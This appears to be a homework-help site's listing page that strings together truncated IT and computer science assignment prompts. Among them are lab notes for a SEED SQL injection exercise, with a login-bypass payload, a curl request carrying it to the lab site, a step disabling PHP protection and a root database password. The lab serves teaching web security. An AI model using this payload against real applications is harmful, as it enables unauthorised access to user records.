  • Networks have changed drastically over the last 30 years.  With the first introduction of the 56k modem, which was about - Networks have changed drastically over the last 30 years.  With the first introduction of the 56k modem, which was about 3 typewriter pages per second, to speeds well over 1Gbps these days, the ability to use networks globally, has changed the way we do business.  Using research, determine where networks will go in the next 5-10 years and how that might impact the global economy.    Please make your initial post and two response posts substantive. A substantive post will do at least TWO of the following: Ask an interesting, thoughtful question pertaining to the topic Answer a question (in detail) posted by another student or the instructor Provide extensive additional information on the topic Explain, define, or analyze the topic in detail Share an applicable personal experience Evaluate the history of cryptography from its origins.  Analyze how cryptography was used and describe how it grew within history. Evaluate the history of cryptography from its origins.  Analyze how cryptography was used and describe how it grew within history.  The writing assignment requires a minimum of two to three written pages to evaluate history.  You must use a minimum of three scholarly articles to complete the assignment.  The assignment must be properly APA formatted with a separate title and reference page (total 5 pages in the count. You are an IT Executive Director at a local hospital and you have been tasked to chair three important committees. Question You are an IT Executive Director at a local hospital and you have been tasked to chair three important committees. COOP (Continuance of Operations Plan) HIPAA-Compliance (Patient Confidentiality) TCO (Total Cost of Ownership) As the chair of the COOP and HIPAA-Compliance committee you are to plan so no unforeseen circumstances force essential data such as billing and medical records to not be available and that all systems are recoverable despite any hazard. Provide recommendations and assess the risks and formalize network security policies, procedures and recommendations. Effectively communicate to management the implications of network services to business continuity and assist management in continuance of operations planning. As the chair of the TCO committee…

    Networks have changed drastically over the last 30 years.  With the first introduction of the 56k modem, which was about Read More »

  • Each below Discussion Assignments should be 200-300 words. I have attached pdf textbook for reference Discussion assignment 7:  Topic: Discuss the advantages and - Each below Discussion Assignments should be 200-300 words. I have attached pdf textbook for reference Discussion assignment 7:  Topic: Discuss the advantages and disadvantages of record recovery.  Name at least three key points.  Discussion Assignment 8:  Topic: A simulated disaster and comprehensive recovery test may involve many of an organization’s key personnel for several days: is this a reasonable burden to place on a busy, competitive company? How would you argue against the inevitable tendency to shortcut the procedure? Random numbers (or, at least, pseudorandom numbers) are essential in cryptography, but it is extremely difficult even for powerful hardware Random numbers (or, at least, pseudorandom numbers) are essential in cryptography, but it is extremely difficult even for powerful hardware and software to generate them. Go online and conduct research on random number generators. What are the different uses of these tools besides cryptography? How do they work? Explain your answer using your own words in 2-3 paragraphs.  No Plagiarism Discussion 4.1 Due: Initial Post due Wednesday, Replies due Sunday What are some things you should consider when conducting social engineering?  Why?  Discussion 4.1 Due: Initial Post due Wednesday, Replies due Sunday What are some things you should consider when conducting social engineering?  Why?  What things should you avoid?  Why?  Weekly Summary 4.1  Write and submit a brief summary of the important concepts learned during the week in your own words. The summary will include a summary of the instructor's weekly lecture including any information included in the lecture. This is not a review of the book, but it is a personal view of the lecture and presentations. Book Review Chapters 4 and 5  After reading, chapters 4 and 5, write a 3-4 page review (not including the Title page or Reference page) of the chapter. The review is to give your point of view on the topics found on pages 122 and 123 of Don't Forget section of the book Strictly APA formatting and proper Citing. Big Data The rising importance of big-data computing stems from advances in many different technologies.  Some of these include: Sensors Big Data The rising importance…

    Each below Discussion Assignments should be 200-300 words. I have attached pdf textbook for reference Discussion assignment 7:  Topic: Discuss the advantages and Read More »

  • Create a 2-3 page APA format paper on a cyber tool of your choice. Act as if you are apart - Create a 2-3 page APA format paper on a cyber tool of your choice. Act as if you are apart of a security team and your task is to inform the rest of the team about a new cyber tool being implemented. I need this back TODAY.  Be sure to include: - the purpose of the tool -configuration requirements -what data is gathered by this tool... it has to be useful to a security team -how will the security team use the data -why is the tool important to security team -how is the data analyzed Can I get help with ''Week 8 Discussion: Understanding the Work of the IT Governance Board Question Get Answer Can I get help with ''Week 8 Discussion: Understanding the Work of the IT Governance Board In this final week of your internship, your rotation assignment takes you back to the Chief of Staff's Office where you started out seven weeks ago.Among other things, the Chief of Staff's organization is responsible for organizing meetings and providing support to the various internal governance boards and executive committees that comprise the internal governance infrastructure. Last week, you had a brief introduction to the work of one of these boards -- the IT Governance board -- when you helped the Chief Financial Officer and CFO staff put together a briefing to inform the board's members about a technology problem. The work of the company's governance boards and committees is extremely important since these groups plan, design, negotiate, implement and provide oversight for the processes, policies, procedures, and other mechanisms used to guide, monitor, control, and assess the operations of the company. Each board is comprised of executives who each represent their functional areas or a group of internal stakeholders. Usually, there is a chair position that rotates among the members. If you would like to learn more about corporate governance in general, Deloitte's report Developing an effective governance operating model: A guide for financial services boards and management teams provides a brief but comprehensive overview (see https://www2.deloitte.com/content/dam/Deloitte/global/Documents/Financial-Services/dttl-fsi-US-FSI-Developinganeffectivegovernance-031913.pdf). You may also find this article What is a management system?,…

    Create a 2-3 page APA format paper on a cyber tool of your choice. Act as if you are apart Read More »

  • You received a dataset about the number of items sold for your inventory. Computer Science Assignment Help - Question You received a dataset about the number of items sold for your inventory. It's essentially a sorted list of numbers like this: [1, 1, 1, 2, ...., 5252, ...., 1123111]. You decided to use CCDF to visualize the data distribution. If your dataset has N = 10000 items and you normalize it so that CCDF varies between 0 and 1, then what would be the value of the CCDF at x = 1123111?a) 1/1,123,111b) 0.0001c) 1.0d) 0.01Given the same dataset mentioned above, what would be the value of the CCDF at x = 1?a) 1.0b) 0.01c) 1/1,123,111d) 0.0001 Note: All program should be in microprocessor and assembly language Question Get Answer Note: All program should be in microprocessor and assembly language 1) do an assembly program to identify room statusassume that you have read a record into AX called Room Status.such that each bit or group of bits is actually a subfield:BITS USAGE0-1 Type of room (0,1,2,3) your program should display Type number.2-7 Number of Seats(4-252)if num of seats are between (0-100 your program should display mesage "Room is small")if num of seats are between (101-252 your program should Display "Room is large")2) Assume that a system has a 16-bit virtual address with a 1-KB page size. do an assembly program that is passed a virtual address (in decimal or in hex) from user and have it output the page number and offset for the given address. As an example, your program would run as follows:Input= 19986Your program would output:The address 19986 contains:page number = 19offset = 530Writing this program will require using the appropriate data type to store 16 bits. ________ equi-join a. returns all records of designated table ________ Question ________ equi-join a. returns all records of designated table ________ derived table b. keeps redundant columns ________ natural join c. utilizes values from main query in the subquery ________ correlated subquery d. outcome of a query embedded in the FROM clause ________ outer join e. a set of SQL statements executed under specific conditions ________ trigger f. does not keep redundant columns ________ procedure g. collection of…

    You received a dataset about the number of items sold for your inventory. Computer Science Assignment Help Read More »

  • Please write anonymous PL/SQL program to print out the first 10 numbers of the following sequence F(n). - Question Please write anonymous PL/SQL program to print out the first 10 numbers of the following sequence F(n). F(1) = 2, F(2)=8. F(n)=4*F(n-1)-3*F(n-2).E.g., F(3) = 4*F(2) - 3 F(1) = 4*8-3*2=26,....Your program will print out F(1),F(2),..., F(10). Hint: use three variables, the first storing F(n), the second storing F(n-1), and the third storing F(n-2). Think of how to compute the first variable from the other two and how to update the other two variables in each iteration. Pay attention to order of updates 1. Each record in the results.dat data file contains two repeating Question Get Answer 1. Each record in the results.dat data file contains two repeating blocks of fields. The first value in each block is a team number (team), the second value in each block is a name of one of the team members (member), and the third value in each block is the member's score (score) on an agility test. Read the data file into a data set called results. Print the data set, so that when printed it looks like this: Provide full SAS code and output screenshot. DataSet11 john 77 11 james 8822 bobby 55 22 opey 8933 maria 66 33 ian 9044 joan 56 44 jane 8255 jack 65 55 jill 922. Every four records in the addresses.dat data file contains ID and address information for one person. The first record contains the subject's name (Name), the second record contains the subject's street address (Street), the third record contains the subject's town (Town), state (State), and zip code (Zip), and the fourth record coontains the subject's four-digit identification number (ID). Read the data file into a data set called addresses. Print the data set so that when printed without VAR or ID statements, the output looks like this. Provide full SAS code and output screenshot.DataSetAlice Smith123 Elm St.East Podunk PA 199921024Maryann White756 Washington Ave.East Podunk PA 199921167Thomas Jones432 Main StreetWest Podunk PA 199911168Benedictine Arnold245 Ferguson Ave.East Podunk PA 199921201Felicia Ho110 Jefferson Blvd.West Podunk PA 199911302Do not to use a VAR or ID statement. Use forward slash (/) and pound-n (#n) line pointer controls…

    Please write anonymous PL/SQL program to print out the first 10 numbers of the following sequence F(n). Read More »

  • Employee – empID: String – firstName: String – lastName: String- payRate: Real Employee()- SetEmpID(theID: String)- SetFirstName(fName: String)- SetLastName(lName: - Question Employee - empID: String - firstName: String - lastName: String- payRate: Real Employee()- SetEmpID(theID: String)- SetFirstName(fName: String)- SetLastName(lName: String)- SetPayRate(testPay: Real)- ValidString(testString: String, validMin: Integer, validLength: Integer, txtMSG: String):String- ValidPay(pay: Real): Real DisplayEmployee():String Creat an employee class based on this UML class diagram.The setters should prompt the user for the information to set the value of the instance variables. These are the validation rules:· The ID has to be 4 characters long. If it is invalid the characters XXXX have to replace the invalid ID.· The minimum length for a first or last name is 2 characters and the maximum length is 20 characters. If invalid the first or last name have to be replaced with XXXX.· The pay rate has to be between 0 and 1000000. If invalid the pay rate has to be replaced with 0.Use the ValidString Function to validate the first name, last name and empID. The invalid message should include which item was incorrect. For example if the first name was incorrect it should display "Invalid first name. Set to XXXX"The DisplayEmployee getter function should display all of the employee information.Create a program that uses the Employee class to an array of employee objects based on the user's input. It should then display all of the employee data in the array. An affine block cipher is one where the key specifies a non-singular Question Get Answer An affine block cipher is one where the key specifies a non-singular s by s matrix A and an s-tuple t to define the affine transformation c = Am t where , m is a block of plaintext (size s) and c is the corresponding ciphertext. c, A and m all are over GF(2). Show that the number of affine transformations are 2s (2s - 1) (2s - 2) (2s - 22 ) ... (2s - 2s-1 ). 1) Create a truth table for the expression ((a AND b) OR (c AND d) Question Get Answer 1) Create a truth table for the expression ((a AND b) OR (c AND d) OR (a AND d)). Remember that since…

    Employee – empID: String – firstName: String – lastName: String- payRate: Real Employee()- SetEmpID(theID: String)- SetFirstName(fName: String)- SetLastName(lName: Read More »

  • Consider we have n benches of different capacities (one seater, two seater, three seater and so on). These benches - Question Get Answer Consider we have n benches of different capacities (one seater, two seater, three seater and so on). These benches are labeled from 1 to n. Labeling is done randomly, this means, the bench labeled 1 can have seating capacity 5while labeled 2 may have capacity one. You are not allowed to rearrange/change the bench label. Your aim is toplace these benches in the row-first order starting from the bench labeled 1 in a classroom of fixed width andinfinite length. Furthermore, you are required to keep one seat space between the benches placed in a row. Yourobjective is to neatly place the benches per row by reducing the number of spaces at the end of rows.For example, consider the sequence of benches which needs to places in a classroom with awidth wise seating capacity of 15. Then optimal arrangement will be:row1: 5_3_5row2: 8_4row3: 4_7row1 has no space at the end while row2 and row3 have 2 and 3 respectively.a) Design a greedy algorithm for this problem.b) Consider Student-A uses sum of the spaces at the end of rows to calculate the quality of the solution.Whereas Student-B uses sum of the cube of the space count at the end of each row. For the above example,the metric of Student-A will generate 0 2 3 = 5 while, Student-B's will generate 0 3 2 3 3 3 = 35.Which one do you think is a better metric? Justify your answer with an example.c) Prove that it is not optimal by giving a counter example. 21)Determine if the edge set{(a, d), (a,c), (d,b), (d,e)} represents a tree. Question 21)Determine if the edge set{(a, d), (a,c), (d,b), (d,e)} represents a tree. 22)23)Is it possible for the root of a tree to have a degree less than a leaf of the tree?24)Determine if the edge set {(2,1), (2,3), (4,5), (4,6)} represents a tree. 25)26)27)Determine if it is possible for a rooted tree with a root of degree greater than 2 to have an Euler path. If so, provide the graph. If not, explain why.28)29)Determine if the edge set {(b,d), (d,e), (d,f), (a,e), (b,g),…

    Consider we have n benches of different capacities (one seater, two seater, three seater and so on). These benches Read More »

  • Ive agreed to help a friend decide which computer to purchase that - Question Ive agreed to help a friend decide which computer to purchase that will fit their needs of browsing the Internet, paying bills, and occasionally playing some games. My friend also takes a lot of family photos and videos and wants to be able to edit them on the computer. What type of computer should I recommend your friend purchases? Consider such items as storage space, type of processor, graphic devices, additional external devices. How will each of these recommendations support my friend's needs. What is the rationale behind your selections. Q: Write an assembly language program to find out the product of two Question Get Answer Q: Write an assembly language program to find out the product of two arrays of 8-bit n numbers, where size "n" is stored at offset 600 and the numbers of first array are stored from offset 601 and the numbers of second array are stored from offset 701 and store the result numbers into first array i.e. offset 601 ?note! perform it on DOSBOX please .. Podcast assignment:The goal of the assignment is to make a 7-10-minute-long Question Podcast assignment:The goal of the assignment is to make a 7-10-minute-long podcast that introduces a topic that has a strong connection to Algorithm course, but was not covered in greater details during class.Podcasting offers the opportunity to broadcast engaging audio content, which the audience can then listen to at any time. One of the great advantages of the podcast format is that it can be consumed in otherwise wasted time, or alongside a routine activity like commuting or doing the dishes. In future versions of Algorithm course, I would like to offer student-made podcasts, which were recorded by students from previous semesters. The goal is to complement the class material, and to make a engaging course.For example, last semester we were interested in illustrating different 'algorithm types': -exact algorithms which compute the exact solution of a computational problem; -heuristic algorithms that compute 'acceptable' solutions for computational problems, but for which there are no formal correctness proofs; and -approximation algorithms which compute solutions that are provably…

    Ive agreed to help a friend decide which computer to purchase that Read More »

  • A) Add a Navigation form to your application.  A navigation form makes it easy for users to switch between the various - A) Add a Navigation form to your application.  A navigation form makes it easy for users to switch between the various forms and reports in your database. Navigation forms are a great addition to any desktop database. Every Access database application should have a navigation form. B) Security Set a password for the database . Password should be set to dwolf.  Have the menus and toolbar not show when MS ACCESS is running However, once you do this you will find that you can’t edit your Navigation Form.  So how do you get your menus and toolbar back? Hold down the shift key while opening your database.    Have your Navigation Form automatically loaded when your database is opened . description of functionality for each of the layers of the OSI Reference Question description of functionality for each of the layers of the OSI Reference Model. Compare and contrast TCP/IP layers with OSI layers. Finally, relate the various terms to the appropriate OSI layer. Slides should be set up as follows: -Slide 1: Title -Slide 2: Describe the purpose and function for each of the OSI Reference Model layers. -Slides 3-4: Compare and contrast the TCP/IP layers with OSI layers. -Slide 5-6: Provide a TCP/IP protocol or network device that would relate to each layer in the OSI reference model. Include the purpose or function of your example (e.g., a switch would be a network device used for connecting devices to a network at the OSI-RM data link layer). DUE 10/12    4P.M EST   For this Assignment, you will examine the one-way ANOVA based on a research question. To prepare for this DUE 10/12    4P.M EST   For this Assignment, you will examine the one-way ANOVA based on a research question. To prepare for this Assignment: Review this week’s Learning Resources and media program related to one-way ANOVA testing. Using the SPSS software,  High School Longitudinal Study dataset (ATTACHED Based on the dataset you chose, construct a research question that can be answered with a one-way ANOVA. Once you perform your one-way ANOVA analysis, copy and paste your output into…

    A) Add a Navigation form to your application.  A navigation form makes it easy for users to switch between the various Read More »

  • Assignment: Take individual files as attachments and add them into the websites.  So far, you should have created an image file Computer Science Assignment Help - Assignment: Take individual files as attachments and add them into the websites.  So far, you should have created an image file of Saint Leo University, an audio file saying "Hello World", and an image file as logo in module 3, you will incorporate these files created in module 3 into the Pacific Resort website you created for the weekly assignment up till now, you can personalized the existing website to include these three files, it can be added to any web page that you think will work best with these three files. Lesson 4 Discussion Forum Communication and Team Decision Making Part 1: Sharpening the Team Mind: Communication and Collective Intelligence A.    What are some of the Lesson 4 Discussion Forum Communication and Team Decision Making Part 1: Sharpening the Team Mind: Communication and Collective Intelligence A.    What are some of the possible biases and points of error that may arise in team communication systems? In addition to those cited in the opening of Chapter 6, what are some other examples of how team communication problems can lead to disaster? B.      Revisit communication failure examples in Exhibit 6-1. Identify the possible causes of communication or decision-making failure in each example, and, drawing on the information presented in the chapter, discuss  measures that might have prevented problems from arising within each team’s communication system. Part 2: Team Decision-Making: Pitfalls and Solutions A.    What are the key symptoms of groupthink? What problems and shortcomings can arise in the decision-making process as a result of groupthink?  B.    Do you think that individuals or groups are better decision-makers? Justify your choice. In what situations would individuals be more effective decision-makers than groups, and in what situations would groups be better than individuals? Read the above topic and discuss it in 300 words using APA format. Sheet1 make price mpg rep78 headroom trunk weight length turn displacement gear_ratio foreign Merc. Zephyr 3291 20 3 3.5 17 2830 195 43 140 3.0799999237 Domestic Chev. Chevette 3299 29 3 2.5 9 2110 163 34 231 2.9300000668 Domestic Chev. Monza 3667 24 2 2 7 2750 179 40 151 2.7300000191 Domestic Toyota Corolla 3748 31 5…

    Assignment: Take individual files as attachments and add them into the websites.  So far, you should have created an image file Computer Science Assignment Help Read More »

  • A utility company’s website is attacked by a botnet, a program built specifically to replicate malicious software on the Web. - A utility company’s website is attacked by a botnet, a program built specifically to replicate malicious software on the Web. It was spreading rapidly online by injecting itself into vulnerable websites and then waiting for unsuspecting users to click on the site. When they did, the code copied itself on their computers. In a few months, 360,000 sites had been infected. The botnet was diabolically engineered to sniff out the Achilles heel in SQL. The botnet co-opted an application on the company Website and injected itself directly into a company database. The fear was that in the process, it could get past the utility’s larger security perimeter and have its way with the company’s software portfolio of applications, database tools and other code. It also had the potential to install itself on the computers of anyone who visited the utility’s website. The attack was a legitimate risk to the utility company. The utility knew it wanted (needed) a new culture for how it engineered, developed and tested its software. It also knew it wanted that culture grounded in widely accepted standards. That way, coders could learn from one another, and the company would not be re-inventing its cultural wheel to make its software more secure. The catch was, no one on staff knew much about how to make applications safer. The design phase of the cyber security development lifecycle (CSDL) requires developers to create something called a cyber threat model. That is, a sense of the cyber attacks an application might face. What kind of exploits might a cyber attacker use? How would hackers gain access to an application running on a computer network? What older, existing pieces of code associated with the new application might be vulnerable? This overall feel for the risks an application might come under allows coders to anticipate risks. Threat models need not be complex: Even high-quality ones can be done on the back of cocktail napkins. Once the standard was set, critical areas were addressed and basic training was completed, next up was spreading the new cyber security culture inside the utility. Two basic…

    A utility company’s website is attacked by a botnet, a program built specifically to replicate malicious software on the Web. Read More »

  • Patch VM with SQL lab environment ================================================== 1) download and decompress patch file ——————- wget http://mars.syr.edu/html/seed/patch.tar.gz tar -zxvf patch.tar.gz 2) test web - Patch VM with SQL lab environment ================================================== 1) download and decompress patch file ------------------- wget http://mars.syr.edu/html/seed/patch.tar.gz tar -zxvf patch.tar.gz 2) test web page URL ----------------- http://www.SEEDLabSQLInjection.com 3) install curl software --------------------- sudo apt-get update sudo apt-get install curl 4) turn off protection ------------------- sudo gedit /etc/php5/apache2/php.ini sudo service apache2 restart Task 1: MySQL Console ================================================== 1) login MySQL Console ------------------- mysql -u root -pseedubuntu 2) show database table ------------------- show databases; use Users; show tables; SELECT * FROM credential; Task 2.1: SQL injection attack via webpage ================================================== 1) SQL injection string -------------------- 'or name='Admin';-- a 2) web application login logic --------------------------- SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE eid= '$input_eid' and Password='$input_pwd'; Task 2.2: SQL injection attack via command line ================================================== 1) curl get request ---------------- curl "http://www.seedlabsqlinjection.com/unsafe_credential.php?EID=' or name='admin';-- Your final research paper assignment is to write a research paper that explains how defense-in-depth (chapter 6) and awareness (chapter Your final research paper assignment is to write a research paper that explains how defense-in-depth (chapter 6) and awareness (chapter 10) are complimentary techniques to detect emerging threats and strengthen countermeasures.  To complete this assignment, upload a Microsoft Word document (.doc or .docx) that contains your complete paper. You must also upload a pdf of EVERY reference that you cite in your paper. Remember that your list of sources must be in APA format, and you MUST cite your reference in the body of the paper using APA in-text citation format. A source is any paper or article that you will reference in your paper. If you need more information on APA format (for references list AND in-text citations), visit this reference: https://owl.english.purdue.edu/owl/resource/560/01/ This assignment must be YOUR OWN WORK!  This is an individual assignment. Plagiarism detected in your work will result in a grade of zero for the entire paper.  Here are a few details about the overall research paper Please look at the attached rubric for details on how the paper will be graded.  You must reference two (4) peer-reviewed articles or papers that support your thesis statement. Two of these papers may be…

    Patch VM with SQL lab environment ================================================== 1) download and decompress patch file ——————- wget http://mars.syr.edu/html/seed/patch.tar.gz tar -zxvf patch.tar.gz 2) test web Read More »

  • You recently joined a local cyber security “hackers” group that meets once a month to discuss recent cyber security related - You recently joined a local cyber security “hackers” group that meets once a month to discuss recent cyber security related events, as well as tools and techniques. You have offered to present at the next meeting, and discuss some of the tools available in the Kali Linux. The Tool that assigned to you is Hping3. This assignment has three components: ●(75 pts) - Create a one page single spaced Executive Summary of the tool assigned below ●(75 pts) - Present 10/23/18,  for 3-5 mins in front of class regarding below assigned tool ●(50 pts) - Create sufficient presentation slides to be used during the 3-5 min. PowerPoint Details: ●Brief discussion about yourself and your cyber skills - remember you are presenting to a “hackers club/group” ●Background information on the “category type” of the tool you are presenting on ●Present specifics about the tool, and what purpose it serves ●Overview of usage of the tool and benefits The local Chamber of Commerce has asked you to speak at the next meeting on your business' successful social media The local Chamber of Commerce has asked you to speak at the next meeting on your business' successful social media campaign. They asked you to specifically touch on how social media can be used to make potential customers aware of what the company has to offer. Create a 1-page outline of your speaking points on this topic. Include the following information: Benefits of social media How social media can be used to promote a company's services Brief examples Submit your outline to the Assignment Files tab above. You are hired as a research coordinator by the new hospital in town. One mission of the hospital is to You are hired as a research coordinator by the new hospital in town. One mission of the hospital is to work hard in preventing health issues by using new technologies created by health conscious engineers. Your task is to review health-related videos and articles and provide a summary of current technology being used in the medical field to prevent health issues for the hospital stakeholders. Your summary…

    You recently joined a local cyber security “hackers” group that meets once a month to discuss recent cyber security related Read More »

  • On April 18, 2016, The United States Supreme Court denied a petition for certiorari (refused to review the lower court’s - On April 18, 2016, The United States Supreme Court denied a petition for certiorari (refused to review the lower court’s ruling) in the case of Authors Guild v. Google, Inc., 804 F. 3d 202 - Court of Appeals, 2nd Circuit 2015. That case let stand the ruling of the Court of Appeals which can be found at the following website: https://scholar.google.com/scholar_case?case=2220742578695593916 1. Using the Internet, each member of your team should read at least 3 academically reviewed articles on designing. Summarize 1. Using the Internet, each member of your team should read at least 3 academically reviewed articles on designing. Summarize the articles in 300 words or more. Provide appropriate reference.  2. Combine each summarize in one paper but do not change the wording of the original summary. Include the team member’s name, name of the article and references. 3. As a term, write a comprehensive summary of the articles. Present a discussion of what your team learned from this exercise. Your company is considering the adoption of a rigorous form of quality management to keep projects focused on business goals. Your company is considering the adoption of a rigorous form of quality management to keep projects focused on business goals. You are somewhat acquainted with a variety of approaches to quality management. Your boss has asked you to create a report to answer some questions.  In a report of 4–5 pages, complete the following: Discuss the following quality management approaches:  TQM Plan-do-check Six sigma Just in time  Which of the principles align most with project management phases? Justify your selected choice with concrete examples. Conduct analysis of the quality management tools and techniques that are used in project quality planning, project quality assurance, and project quality control. Provide perspective by outlining how they impact the overall project quality management process.  Complete your paper and reference sources using APA style. due in 5 hours...donot waste mine and your time if you cannot do Task description: The data set comes from the Kaggle due in 5 hours...donot waste mine and your time if you cannot do Task description: The data set…

    On April 18, 2016, The United States Supreme Court denied a petition for certiorari (refused to review the lower court’s Read More »

  • Hello, i need two different posts(responses) with 200 words each on the below topic. 1.  Develop a product service idea. A. Describe the product/service - Hello, i need two different posts(responses) with 200 words each on the below topic. 1.  Develop a product service idea. A. Describe the product/service including the benefits of using the product/service B. Discuss the potential customers for this product/service 2.  Based on the nature of the product/service, recommend at least 3 possible social media to use in marketing the product/service. Describe your recommendations and discuss the advantages and disadvantages of each.  Please use API throughout and avoid plagiarism. Privacy laws in other countries are an important concern when performing cloud forensics and investigations. You've been assigned a case Privacy laws in other countries are an important concern when performing cloud forensics and investigations. You've been assigned a case involving PII data stored on a cloud in Australia. Before you start any data acquisition from this cloud, you need to research what you can access under Australian law. For this project, look for information on Australia's Privacy Principles (APP), particularly Chapter 8: APP 8 – Cross-border disclosure of personal information. Write a 2 to 3 page paper (not including title and reference pages) using APA format summarizing disclosure requirements for getting consent from data owners, and any exceptions allowed by this law. Writing Requirements 2-3 pages in length  (excluding cover page, abstract, and reference list) APA format, Use the APA template located in the Student Resource Center to complete the assignment. Please use the Case Study Guide as a reference point for writing your case study. Two paragraphs each  Separate responds  1. Functional vs. Nonfunctional Requirements" Please respond to the following: Explain why both functional and nonfunctional requirements are important Two paragraphs each  Separate responds  1. Functional vs. Nonfunctional Requirements" Please respond to the following: Explain why both functional and nonfunctional requirements are important in IT development. Include at least two (2) examples to support your answer. Please make sure that your examples are different from other students 2. . Innovation" Please respond to the following: Speculate on why Agile development and project management drives innovation and traditional “waterfall” project management cannot. Give your opinion as to whether or not this is one of the reasons why…

    Hello, i need two different posts(responses) with 200 words each on the below topic. 1.  Develop a product service idea. A. Describe the product/service Read More »

Don`t copy text!